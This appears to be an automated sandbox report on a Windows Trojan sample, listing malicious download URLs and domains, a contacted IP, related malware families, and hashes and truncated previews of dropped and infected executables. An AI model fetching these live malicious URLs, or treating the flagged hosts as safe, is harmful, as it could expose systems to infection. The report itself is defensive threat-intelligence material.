https://punchtelephoneverdi.store/	Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337936959.0000000001F12000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342700657.0000000001F15000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1338255788.0000000001F14000.00000004.00000020.00020000.00000000.sdmp	false	20%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://strainriskpropos.store/	Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342368005.0000000001EE3000.00000004.00000020.00020000.00000000.sdmp	false	21%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://www.smartsharesystems.com/Morten	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k3.raroC:	oHOvZLBf.exe, 00000002.00000002.1538999460.0000000000C6C000.00000004.00000020.00020000.00000000.sdmp	true	14%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.develop.com	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
http://www.lua.org	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
https://strainriskpropos.store/apiG	Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337936959.0000000001F12000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342700657.0000000001F15000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1338255788.0000000001F14000.00000004.00000020.00020000.00000000.sdmp	true	17%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://smallrabbitcrossing.site/	Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337936959.0000000001F12000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342700657.0000000001F15000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1338255788.0000000001F14000.00000004.00000020.00020000.00000000.sdmp	false	22%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.spaceblue.com	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
http://www.baanboard.com	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
http://www.develop.comDeepak	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k3.rar4	oHOvZLBf.exe, 00000002.00000002.1538999460.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	true	14%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://ddos.dnsnb8.net:799/cj//k1.rarc	oHOvZLBf.exe, 00000002.00000003.1308206699.0000000000C52000.00000004.00000020.00020000.00000000.sdmp, oHOvZLBf.exe, 00000002.00000002.1538999460.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	true	12%, Virustotal, Browse Avira URL Cloud: phishing	unknown
https://smallrabbitcrossing.site/M	Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337936959.0000000001F12000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342700657.0000000001F15000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1338255788.0000000001F14000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
44.221.84.105	ddos.dnsnb8.net	United States		14618	AMAZON-AESUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1481154
Start date and time:	2024-07-25 04:57:40 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 27s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Lisect_AVT_24003_G1A_70.exe
Detection:	MAL
Classification:	mal100.spre.troj.evad.winEXE@7/15@8/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 13 Number of non-executed functions: 14
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.65.92
Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
00:31:42	API Interceptor	1x Sleep call for process: WerFault.exe modified
22:58:42	API Interceptor	2x Sleep call for process: Lisect_AVT_24003_G1A_70.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
44.221.84.105	Lisect_AVT_24003_G1A_5.exe	Get hash	malicious	Quasar, Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k1.rar
	Lisect_AVT_24003_G1A_16.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k2.rar
	LisectAVT_2403002C_193.exe	Get hash	malicious	Bdaejec, Metasploit	Browse	ddos.dnsnb8.net:799/cj//k3.rar
	LisectAVT_2403002C_196.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k1.rar
	LisectAVT_2403002B_91.exe	Get hash	malicious	Bdaejec, DBatLoader	Browse	ddos.dnsnb8.net:799/cj//k2.rar
	LisectAVT_2403002B_492.exe	Get hash	malicious	Bdaejec, Lokibot	Browse	ddos.dnsnb8.net:799/cj//k5.rar
	LisectAVT_2403002B_97.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k2.rar
	LisectAVT_2403002B_28.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k1.rar
	LisectAVT_2403002B_351.exe	Get hash	malicious	Amadey, Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k5.rar
	LisectAVT_2403002B_28.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k1.rar

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ddos.dnsnb8.net	Lisect_AVT_24003_G1A_5.exe	Get hash	malicious	Quasar, Bdaejec	Browse	44.221.84.105
	Lisect_AVT_24003_G1A_16.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	LisectAVT_2403002C_193.exe	Get hash	malicious	Bdaejec, Metasploit	Browse	44.221.84.105
	LisectAVT_2403002C_196.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	LisectAVT_2403002B_91.exe	Get hash	malicious	Bdaejec, DBatLoader	Browse	44.221.84.105
	LisectAVT_2403002B_492.exe	Get hash	malicious	Bdaejec, Lokibot	Browse	44.221.84.105
	LisectAVT_2403002B_97.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	LisectAVT_2403002B_28.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	LisectAVT_2403002B_351.exe	Get hash	malicious	Amadey, Bdaejec	Browse	44.221.84.105
	LisectAVT_2403002B_28.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-AESUS	Lisect_AVT_24003_G1A_5.exe	Get hash	malicious	Quasar, Bdaejec	Browse	44.221.84.105
	Lisect_AVT_24003_G1A_16.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	LisectAVT_2403002C_193.exe	Get hash	malicious	Bdaejec, Metasploit	Browse	44.221.84.105
	LisectAVT_2403002C_196.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	LisectAVT_2403002B_91.exe	Get hash	malicious	Bdaejec, DBatLoader	Browse	44.221.84.105
	LisectAVT_2403002B_492.exe	Get hash	malicious	Bdaejec, Lokibot	Browse	44.221.84.105
	LisectAVT_2403002B_97.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	LisectAVT_2403002B_28.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	LisectAVT_2403002B_351.exe	Get hash	malicious	Amadey, Bdaejec	Browse	44.221.84.105
	LisectAVT_2403002B_28.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Lisect_AVT_24003_G1A_5.exe	Get hash	malicious	Quasar, Bdaejec	Browse
	Lisect_AVT_24003_G1A_16.exe	Get hash	malicious	Bdaejec	Browse
	LisectAVT_2403002C_193.exe	Get hash	malicious	Bdaejec, Metasploit	Browse
	LisectAVT_2403002C_196.exe	Get hash	malicious	Bdaejec	Browse
	LisectAVT_2403002B_91.exe	Get hash	malicious	Bdaejec, DBatLoader	Browse
	LisectAVT_2403002B_492.exe	Get hash	malicious	Bdaejec, Lokibot	Browse
	LisectAVT_2403002B_97.exe	Get hash	malicious	Bdaejec	Browse
	LisectAVT_2403002B_28.exe	Get hash	malicious	Bdaejec	Browse
	LisectAVT_2403002B_351.exe	Get hash	malicious	Amadey, Bdaejec	Browse
	LisectAVT_2403002B_28.exe	Get hash	malicious	Bdaejec	Browse

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe
File Type:	MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19456
Entropy (8bit):	6.590765981131731
Encrypted:	false
SSDEEP:	384:1FVSfXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:ohQGPL4vzZq2o9W7GsxBbPr
MD5:	B85963C74F24B6F80499C34A9F86CB27
SHA1:	A064AA8D0114230F242ACFE1E8363077D5190AFB
SHA-256:	48F1954A86E1E20E15587A66714D4A33F22BF0C31BC00BD88DFDDE84035AA219
SHA-512:	4331169DAF087BF94650C0B5D8D25B1DC6170764554A705A8AC31871CA46F897E4888C789DA9AA0760E7266458DDF25F3C6EA0BD0FCF6D806FE4CEC115FD4831
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y\|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2389504
Entropy (8bit):	6.731341993187748
Encrypted:	false
SSDEEP:	49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
MD5:	5E62A3147ACBFC14C7E12BCAA3D31D62
SHA1:	314DCD04C577860FAEF0E48C015130D074EB2807
SHA-256:	D6525DAC2B921288A05BFF98D160029A02CA611B45817BCF818FEDA2DD6F69F5
SHA-512:	B2739554C7FA6A35F29CE1508C455B1E1ED580662DFBACB677315A752774E43FA475D6E310BCE8412CF8BAE928903B89FCA1D1961E6B5E24FBFC14ECB3D27D43
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................

C:\Program Files\7-Zip\Uninstall.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	31744
Entropy (8bit):	6.366688439142743
Encrypted:	false
SSDEEP:	768:uWQ3655Kv1X/qY1MSdGpQGPL4vzZq2o9W7GsxBbPr:uHqaNrFdG+GCq2iW7z
MD5:	BC412990B626784B049181F135F83235
SHA1:	A388F33D7BC00895403FD1FF73CB181DCDC5B7BA
SHA-256:	EE7053E684610C1194EA663912E180EA2735B33B1672AFFBD6A1EF4D166E2729
SHA-512:	55C683A5F7C68E27A3CB7404C3421EF393658A22C9B61A0B20B055B1878C9278B8FEA0B3276BDFD0110831DCF62AF74BEC971ED9C9C1FD5FEF94619D19A5B8CB
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_oHOvZLBf.exe_ef3ef087bfe1a04e60882b1f0137943404fb79_63dab170_18f3e01d-e9ad-41e1-b61a-5f311b0ed995\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9925602536798901
Encrypted:	false
SSDEEP:	192:InM6bD6a0XEeJgV0jE/J9zuiF6Z24IO8dgpD:ILD6hXEe/jQzuiF6Y4IO8C9
MD5:	15AF380FA0F11415B564A29052AE626C
SHA1:	AB2DA9DC4A6C0D8B3EC655B341369C55F36A66D3
SHA-256:	C7EFDA14DBB82409409279B4CDCFC94E326FDE297DFEC840319DB06D42B505CB
SHA-512:	1769C73A9DD2E1CEC2F321AE8674E8FF0FE6539D51880CD38BE3BC2D5746CECFA2D0995A2519DC28185429AFC56CB6F7CCA2FF9A2DDE8D35DC156BE588BE5443
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.3.4.9.9.2.7.4.6.5.7.1.3.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.3.4.9.9.2.8.1.8.4.4.6.5.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.8.f.3.e.0.1.d.-.e.9.a.d.-.4.1.e.1.-.b.6.1.a.-.5.f.3.1.1.b.0.e.d.9.9.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.b.3.6.9.3.f.2.-.b.2.e.e.-.4.4.9.d.-.9.2.2.7.-.9.4.d.9.1.4.0.0.a.1.c.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.o.H.O.v.Z.L.B.f...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.6.0.-.0.0.0.1.-.0.0.1.4.-.1.8.2.0.-.0.e.8.c.3.e.d.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.a.2.a.a.a.f.5.7.6.4.b.e.0.a.1.8.7.2.1.7.7.d.7.d.d.9.8.3.9.4.1.0.0.0.0.f.f.f.f.!.0.0.0.0.d.4.e.9.e.f.1.0.d.7.6.8.5.d.4.9.1.5.8.3.c.6.f.a.9.3.a.e.5.d.9.1.0.5.d.8.1.5.b.d.!.o.H.O.v.Z.L.B.f...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF3E3.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu Jul 25 02:58:47 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	155176
Entropy (8bit):	1.863192673643621
Encrypted:	false
SSDEEP:	384:nGmM+Ipfj0oox9ggdmAKV9t7CnO8dmNmttq0aVtrESlSLDo6Xa//lwpGw0:nc+Ixnox9zOVf7CnO8HaPDyokaXS4
MD5:	35B8AE6CCA3CA83F5F42DD099F198C7B
SHA1:	2DE2FBAF9F777420AACB55382D0EA657AF09E4FD
SHA-256:	6C24F793FEEEE9B8C80EBAC18193FD5BDE8CF14BA62F05A2C58F8895BB322AEB
SHA-512:	B5937821FFCB8F562515E2BC32F469719DFFF5962A06C56ECC96FB561E318E172BF83A2B895B88E1F34649B295FB7C102F02E0FE51188BC405DE7E8625C35172
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......g..f............D...............X.......l.... ......4...XO..........`.......8...........T...........@>..............h!..........T#..............................................................................eJ.......#......GenuineIntel............T.......`...]..f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF5A9.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6280
Entropy (8bit):	3.7259515648223895
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetbthA632iYmR+u6Ah/5aMQU089bySqsfEgVRmm:R6l7wVeJt2632iYmEepD089byJsfEymm
MD5:	B27286997CC0D916CC9C2B9A9340CF69
SHA1:	E6D74846C635849E8F78DF7BF9ED7F83AD51FE6A
SHA-256:	C1C585E6C55CD8B357E048B90C10D6BD01A7C49E5A4565087C0335DC236036AC
SHA-512:	245DF542973D8DA65B1DD4B6AE56E8014FCF9259136406780A45986FEB4FC654D603A61EF45956425627BF5AA759D1D14A13B8D1CE61B86B6A64B01CD3E4B2E2
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.2.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF5E8.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4565
Entropy (8bit):	4.46325422739156
Encrypted:	false
SSDEEP:	48:cvIwWl8zsErJg77aI9MnWpW8VYmYm8M4J+bt7lFwP1r+q8/Fexi0gm0xd:uIjfwI7+W7VOJz3Tg/xd
MD5:	35082CFB6F6BBE8C637510D79284B2A3
SHA1:	BDC50AE1001E1489BAD60709B5BC4310763A9A49
SHA-256:	C2C84A8AC83FC93A890A34BE744F482676A47BC14B62F4FC5A47A9C9AEF7FFC2
SHA-512:	FE88EAB3EF97B138D627856C319322CE6ACF8FDB446EDA0406D3F8FC126C75DCA208726A17862B8F320A13886AF77B00C68874BDFAC173F539013FB3A2C72CDA
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="425881" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\k1[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\k2[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\k3[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\05734EF9.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\37AE5FF3.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\3C4C055C.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe
File Type:	ASCII text
Category:	modified
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe

Download File

Process:	C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	15872
Entropy (8bit):	7.031075575407894
Encrypted:	false
SSDEEP:	384:IXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:gQGPL4vzZq2o9W7GsxBbPr
MD5:	F7D21DE5C4E81341ECCD280C11DDCC9A
SHA1:	D4E9EF10D7685D491583C6FA93AE5D9105D815BD
SHA-256:	4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794
SHA-512:	E4553B86B083996038BACFB979AD0B86F578F95185D8EFAC34A77F6CC73E491D4F70E1449BBC9EB1D62F430800C1574101B270E1CB0EEED43A83049A79B636A3
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92%
Joe Sandbox View:	Filename: Lisect_AVT_24003_G1A_5.exe, Detection: malicious, Browse Filename: Lisect_AVT_24003_G1A_16.exe, Detection: malicious, Browse Filename: LisectAVT_2403002C_193.exe, Detection: malicious, Browse Filename: LisectAVT_2403002C_196.exe, Detection: malicious, Browse Filename: LisectAVT_2403002B_91.exe, Detection: malicious, Browse Filename: LisectAVT_2403002B_492.exe, Detection: malicious, Browse Filename: LisectAVT_2403002B_97.exe, Detection: malicious, Browse Filename: LisectAVT_2403002B_28.exe, Detection: malicious, Browse Filename: LisectAVT_2403002B_351.exe, Detection: malicious, Browse Filename: LisectAVT_2403002B_28.exe, Detection: malicious, Browse
